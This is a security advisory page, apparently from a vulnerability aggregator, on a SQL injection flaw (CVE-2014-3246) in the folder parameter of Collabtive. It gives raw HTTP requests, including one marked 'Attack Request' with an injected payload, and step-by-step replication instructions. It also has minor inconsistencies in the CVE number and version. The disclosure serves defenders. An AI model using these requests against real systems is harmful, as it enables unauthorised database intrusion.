Collabtive 1.2 - SQL Injection

🗓️ 01 Jul 2014 00:00:00Reported by RootType

SQL Injection in Collabtive 1.2 - CVE-2014-324

Reporter	Title	Published	Views	Family All 11
0day.today	Collabtive 1.12 SQL Injection Vulnerability	8 May 201400:00	–	zdt
Circl	CVE-2014-3246	8 May 201400:00	–	circl
CVE	CVE-2014-3246	13 May 201414:00	–	cve
Cvelist	CVE-2014-3246	13 May 201414:00	–	cvelist
Exploit DB	Collabtive 1.2 - SQL Injection	8 May 201400:00	–	exploitdb
EUVD	EUVD-2014-3260	7 Oct 202500:30	–	euvd
exploitpack	Collabtive 1.2 - SQL Injection	8 May 201400:00	–	exploitpack
NVD	CVE-2014-3246	13 May 201414:55	–	nvd
Packet Storm	Collabtive 1.12 SQL Injection	8 May 201400:00	–	packetstorm
Prion	Sql injection	13 May 201414:55	–	prion


                                                Vulnerability title: SQL Injection / SQL Error message in Collabtive
application (CVE-2014-3246)
CVE: CVE-2014-3246 (cordinated with
Vendor: Collabtive
Product: Collabtive (Open Source Project Management Software)
Affected version: 1.12
Fixed version: 2.0
Reported by: Deepak Rathore
Severity: Critical
URL: http://[domain]/collabtive-12/managefile.php?action=showproject&id=2482
Affected Users: Authenticated users
Affected parameter(s): folder

Issue details: The folder parameter appears to be vulnerable to SQL
injection attacks. The payload 1%3d was submitted in the folder parameter,
and a database error message was returned. You should review the contents
of the error message, and the application&#39;s handling of other input, to
confirm whether a vulnerability is present.  The database appears to be
MySQL.

HTTP request:
GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1
Host: collabtive.o-dyn.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
Firefox/29.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.0.3
Referer:
http://xxx/managefile.php?action=showproject&id=2482
Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
Connection: keep-alive

Steps to replicate:
1. Login into application
2. Go to &#34;Desktop&#34; tab and click on &#34;Add project&#34;
3. Fill the project details in the project form and click on &#34;Add&#34; button
4. After creating a project go to &#34;Files&#34; tab and Intercept the request
5. At &#34;manageajax.php&#34; file, replace &#34;folder&#34; parameter value with &#34;1%3d&#34;
=====================
Original Request
=====================
GET /manageajax.php?action=fileview_list&id=2482&folder=0 HTTP/1.1
Host: collabtive.o-dyn.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
Firefox/29.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.0.3
Referer:
http://xxx/managefile.php?action=showproject&id=2482
Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
Connection: keep-alive
======================
Attack Request
======================
GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1
Host: collabtive.o-dyn.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
Firefox/29.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.0.3
Referer:
http://xxx/managefile.php?action=showproject&id=2482
Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
Connection: keep-alive
======================
6. Forward manipulated request to server and wait for response in browser
7. SQL Error message is the proof of vulnerability.

Tools used: Burp Suite proxy, Mozilla Firefox browser

01 Jul 2014 00:00Current

0.3Low risk

Vulners AI Score0.3

EPSS0.01267